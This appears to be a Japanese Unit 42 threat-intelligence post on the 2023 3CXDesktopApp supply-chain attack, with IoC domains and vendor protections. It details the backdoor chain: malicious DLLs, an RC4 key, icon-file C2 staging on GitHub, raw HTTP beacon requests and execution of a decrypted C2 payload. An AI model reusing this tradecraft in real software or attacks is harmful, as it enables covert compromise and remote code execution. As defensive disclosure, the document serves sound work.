脅威に関する情報: 3CXDesktopAppのサプライチェーン攻撃 (2023-04-03 16:45 PDT)

This post is also available in: English (英語)

概要

2023年3月29日に3CXDesktopAppというソフトウェアベースの電話アプリケーションが関連するサプライチェーン攻撃がありました。3月30日現在、同ソフトウェア開発者のWebサイトにホストされている3CXDesktopAppのインストーラーは、2つの悪意のあるライブラリーを含むアプリケーションをインストールします。これら悪意のあるライブラリーは、最終的にシェルコードを実行してシステムにバックドアをロードし、脅威アクターが被害者のコンピューターに追加のマルウェアをインストールできるようにします。

2023年3月31日更新: 次世代ファイアウォール NGFWでの保護概要を追記しました。

2023年4月3日更新: Cortex XSOARでの保護概要を追記しました。Cortex XDRとCortex XSIAMについて、macOS環境での対応コンテンツ バージョンを記載しました。Cortex XDRをご利用中の皆さまは、とくに更新などの必要なく、過去・現在ともに保護されています。

現時点ではこれらのライブラリーが3CXDesktopAppのインストーラーに含まれるようになった正確な経緯は確認できていません。私たちは脅威アクターらが3CXDesktopAppアプリケーションのビルド過程でこれらのライブラリーを導入した可能性があると推測しています。これらの悪意のあるコンテンツは、3CXDesktopAppユーザーの侵害を目的として正規アプリケーションに追加されていることから、これはサプライチェーン攻撃を意図したものであることが示唆されます。

3CX製品は世界中で広く使われています。弊社のCortex Xpanseは、3CXのアプリケーションを使っている199カ国24万7,277個の一意なIPアドレスのフィンガープリント採取に成功しました。

2023年3月9日〜3月30日の期間、弊社のCortex XDR利用顧客127社において、3CXDesktopAppプロセスがシェルコードを実行しようとしたアクティビティが確認されています。ただし当該アクティビティはXDRエージェントのIn-process Shellcode Protection Module (プロセス内シェルコード保護モジュール)によりブロックされています。シェルコードをブロックしたことから、攻撃で使われたセカンダリー ペイロードは入手できず、そのケイパビリティや脅威アクターによるエクスプロイト後のアクティビティについては特定できていません。

インシデントの詳細

3CXDesktopAppのサプライチェーン攻撃は、脅威アクターが悪意のあるライブラリーを正規3CXDesktopAppのインストール アプリケーションに導入したことから始まりました。おそらくは、3CXDesktopAppのビルド過程で、これらのライブラリーが導入されたものと考えられます。正規インストーラーに悪意のあるライブラリーが含まれていることから、開発元のWebサイトから3CXDesktopAppのインストーラーをダウンロード・実行することにより被害を受けます。

Unit 42チームは本稿公開時点でWindows・macOS両プラットフォームでの実行を意図した悪意のある3CXDesktopAppのインストーラーを確認しています。Windows用はWindows Installer File (.msi)、macOS用はApple Disk Image file (.dmg)として提供されています。図1は攻撃全体の流れを示した図です。

Windowsシステム上ではMSIインストーラーが複数のファイルを抽出し、3CXDesktopApp.exeを実行し、ffmpeg.dllという名前のついた悪意のあるライブラリー ファイルをロードします。コンパイラーのメタデータによれば、このDLLは2022年11月12日にコンパイルされています。

このffmpeg.dllライブラリーは、2番目に抽出されたd3dcompiler_47.dllというファイル名のライブラリーを読み込み、その一部を3jB(2bsG#@c7という鍵を使ってRC4方式で復号し、復号した内容をシェルコードとして実行します。このシェルコードはある組み込みのDLLをロードし、当該DLLがエクスポートしたDllGetClassObjectという関数を呼び出します。

初回実行時、このマルウェアは1～4週間先の日付をランダムに生成します。このタイムスタンプは侵害されたコンピューターの現在時刻と照合され、マルウェアはタイムスタンプの日時までスリープします。こうすることで実行まで長く時間をかせぎ、被害者がプログラムにバックドアが仕込まれていると疑わないようにしています。

このDLLはコマンド&コントロール(C2)サーバーを得るために次のURLからあるアイコン ファイルをダウンロードします。このアイコン ファイルは、ファイル名に1～15までのランダムな数字が含まれています。

hxxps://raw.githubusercontent[.]com/IconStorages/images/main/icon[1-15].ico

このリクエストは以下のような形式です。

GET /IconStorages/images/main/icon1.ico HTTP/1.1
accept: */*
accept-language: en-US,en;q=0.9
accept-encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 3CXDesktopApp/18.11.1197 Chrome/102.0.5005.167 Electron/19.1.9 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
Cache-Control: no-cache

上記のGitHubアカウントは既に存在していませんが、このURLでホストされていたアイコン ファイルは入手できました。表1に当該アイコン ファイルのハッシュ値、ファイル名、ファイル内から抽出したC2 URLを記載します。

表1 ペイロードがC2のURL特定に使ったGitHubアカウントにホストされていたアイコン ファイル

なお、この.icoファイルが、2022年12月7日にこのGitHubリポジトリに最初に登場していたことは注目に値するでしょう(図2のgitログ参照)。ここからは、同攻撃の発生時期について、時系列上の知見が得られます。

.icoファイルをダウンロードし、パースし、復号し、次のステージのURLを抽出した後、マルウェアはそのURLに対してHTTPSリクエストを発行します。このリクエストは以下のような形式です。

GET /api/session HTTP/1.1
accept: */*
accept-language: en-US,en;q=0.9
accept-encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 3CXDesktopApp/18.11.1197 Chrome/102.0.5005.167 Electron/19.1.9 Safari/537.36
Host: officestoragebox.com
Connection: Keep-Alive
Cache-Control: no-cache

このリモートC2サーバーはすでに利用できなくなっていますが、マルウェア自体のコントロール フローから、このマルウェアが何を求めていのたのかがわかります。このC2サーバーには、以下の鍵を含むJSON Blobによる応答が求められていました。

{
"url" : [data],
"meta" : [data],
"description" : [data]
}

この"meta"フィールドをパースしてフィールド内のデータを以前に使ったのと同じルーチンで復号します。最後に、復号データが被害者のコンピューター上で直接実行されます。

既知のmacOS用亜種はいずれも、悪意のあるFFmpegライブラリーを含むdmgインストーラーを使っています。実際のライブラリーは以下のパスに存在しています。

3CX Desktop App.app/Contents/Frameworks/Electron Framework.framework/Versions/A/Libraries/libffmpeg.dylib

macOS用亜種の悪意のあるライブラリーは、Windows用亜種のそれと機能的には似ているものの、より単純です。libffmpeg.dylibライブラリーは、GitHubアカウントにホストされたアイコン ファイルからURLを抽出してC2のURLを取得しようとはしません。macOS用亜種の場合、ハードコードされたURLが16個、通信先C2サーバーとして含まれています(以下の表参照)。

• msstorageazure[.]com/analysis
• officestoragebox[.]com/api/biosync
• visualstudiofactory[.]com/groupcore
• azuredeploystore[.]com/cloud/images
• msstorageboxes[.]com/xbox
• officeaddons[.]com/quality
• sourceslabs[.]com/status
• zacharryblogs[.]com/xmlquery
• pbxcloudeservices[.]com/network
• pbxphonenetwork[.]com/phone
• akamaitechcloudservices[.]com/v2/fileapi
• azureonlinestorage[.]com/google/storage
• msedgepackageinfo[.]com/ms-webview
• glcloudservice[.]com/v1/status
• pbxsources[.]com/queue
• www.3cx[.]com/blog/event-trainings/

なお、上記のwww.3cx[.]comというURLは3CXのベンダーが所有する正規のWebサイトで、本稿執筆時点ではC2通信には使われていないと考えられます。

macOS用亜種で見つかったURLは、pbxphonenetwork[.]comというドメインを除き、Windows用亜種と同じドメインを使っています。しかし同じドメインと通信する場合のmacOSとWindowsの亜種のURLパスは異なります。

CrowdStrikeはこのアクティビティを同社がLabyrinth Chollimaの名前でトラッキングしている脅威アクターによるものであると公式にアトリビュート(帰属)しています。私たちはこのアトリビューションにいたるIoCの重複を確認できていないのですが、この攻撃で使われた3jB(2bsG#@c7というRC4鍵は、Labyrinth Chollimaが関与した以前のアクティビティで確認されたものであると考えられます。Huntress Labsは、以前DPRK(北朝鮮)の脅威アクターがこの鍵を使っていたことがあり、これがLabyrinth Chollimaとの関連性を示唆しうるものと述べています。現時点で私たちはこのIoC重複について判断できかねるため、引き続きアトリビュートに利用できる証拠を探しています。

現在の攻撃スコープ

3CXの発表によると、当該サプライチェーン攻撃の影響を受けたバージョンは、Update 7でリリースされた3CX Electron Windows App (バージョン18.12.407、18.12.416)と、Electron Mac App (バージョン18.11.1213、18.12.402、18.12.407、18.12.416)です。

XDRとXSIAMのテレメトリーによると、弊社顧客127社のシステムで、3CXDesktopAppプロセスによるシェルコード実行試行のアクティビティが確認されています。ただし当該アクティビティはXDRエージェントのIn-process Shellcode Protection Module (プロセス内シェルコード保護モジュール)によりブロックされています。2023年3月9日〜30日の期間、1,832台の一意なシステム上で、同アクティビティに関連する5,796個のイベントが観測されました。注: Cortex XDRをご利用中の皆さまはとくに更新などの必要なくゼロデイの時点から保護されています。

シェルコード実行をブロックしたことから、攻撃で使われたセカンダリー ペイロードは入手できていません。このセカンダリー ペイロードには、脅威アクターがアクティビティの実行を続ける上で必要とする機能が含まれていたはずです。

3CX製品の普及状況を把握するため、一般公開されている同アプリケーションのフィンガープリントを作成し、弊社Cortex Xpanseでインターネットをスキャンしました。このスキャンの結果、このフィンガープリントに一致するIPアドレスは世界199カ国で24万7,277個見つかりました。3CXの製品は世界中の組織で広く使われていることがわかります。

図3は、3CXの製品フィンガープリントと一致するIPアドレスとTCPポートの組み合わせを持つ国のヒートマップを示したものです。

中間ガイダンス

3CXは発表のなかで、アプリケーションをアップデートするさい、デスクトップ アプリケーションではなくPWA 製品を利用するよう同社顧客に提案しています。3月30日現在、C2ドメイン名とアイコン ファイルをホストするGitHubリポジトリはすべて削除されています。ただし、悪意のある既知のバージョンの3CXDesktopAppを実行しているシステムがある場合は、IoC(侵害の痕跡)を調査したほうがよいでしょう。

Unit 42 マネージド スレット ハンティング チームによるクエリ

結論

3CXDesktopAppのサプライチェーン攻撃は大きな注目を集めました。これらの製品は広く使用されていますし、弊社Cortex Xpanseによれば世界中で少なくとも24万7,000台のシステムで使用されているからです。弊社の顧客127社の環境で、侵害された3CXDesktopAppアプリケーションが確認されましたが、XDRエージェントのIn-process Shellcode Protection Module (プロセス内シェルコード保護モジュール)により、悪意のあるシェルコードの実行はブロックされました。

現時点では、悪意のある3CXDesktopAppインストーラーは、アクティブな通信対象のC2ドメインを持っていません。しかしながら、既知の侵害されたバージョンの3CXDesktopAppを実行していたシステムや、いずれかのC2用URLと通信していたシステムは、侵害を受けた可能性があり、調査が必要です。

パロアルトネットワークス製品による3CXDesktopAppのサプライチェーン攻撃からの保護

パロアルトネットワークスのお客様には、弊社製品/サービスの保護・更新を通じ、同脅威の特定と防御が提供されています。

次世代ファイアウォール(NGFW)で脅威防御のセキュリティ サブスクリプションを有効にしている場合、脅威防御シグネチャ86729を介したベストプラクティスがC2トラフィック防止に役立ちます。

侵害の懸念があり弊社にインシデントレスポンスに関するご相談をなさりたい場合は、infojapan@paloaltonetworks.com まで電子メールにてご連絡いただくか、下記の電話番号までお問い合わせください(ご相談は弊社製品のお客様には限定されません)。

• 北米フリーダイヤル: 866.486.4842 (866.4.UNIT42)
• 欧州: +31.20.299.3130
• アジア太平洋: +65.6983.8730
• 日本: +81.50.1790.0200

Cortex XSOAR

『3CXDesktopApp Supply Chain Attack』パックには、サードパーティ インテグレーションでのデプロイ用追加シグネチャと自動化されたプレイブックが含まれています。このプレイブックでIoCの収集や組織のSIEMとXDRにおける高度なクエリ実行を支援します。同プレイブックは、侵害されたおそれのあるエンドポイントの復旧も提供します。

Cortex XDRとCortex XSIAM

In-process Shellcode Protection Module (プロセス内シェルコード保護モジュール)とBTP(Behavioral Threat Protection: 振る舞い防御)は、これらの攻撃に対する保護を提供します。これらのモジュールは、複数の野生(in the wild)の攻撃を、悪質なコードの実行前にブロックしていました。macOSでの対応には実行中のコンテンツ バージョンが910-49625またはそれ以降であることを確認してください。すべてのお客様は保護された状態を保っています。

IoC

ドメイン

• msstorageazure[.]com
• officestoragebox[.]com
• visualstudiofactory[.]com
• azuredeploystore[.]com
• msstorageboxes[.]com
• officeaddons[.]com
• sourceslabs[.]com
• zacharryblogs[.]com
• pbxcloudeservices[.]com
• pbxphonenetwork[.]com
• akamaitechcloudservices[.]com
• azureonlinestorage[.]com
• msedgepackageinfo[.]com
• glcloudservice[.]com
• pbxsources[.]com

2023-04-04 10:20 JST 英語版更新日 2023-04-03 16:45 PDT の内容を反映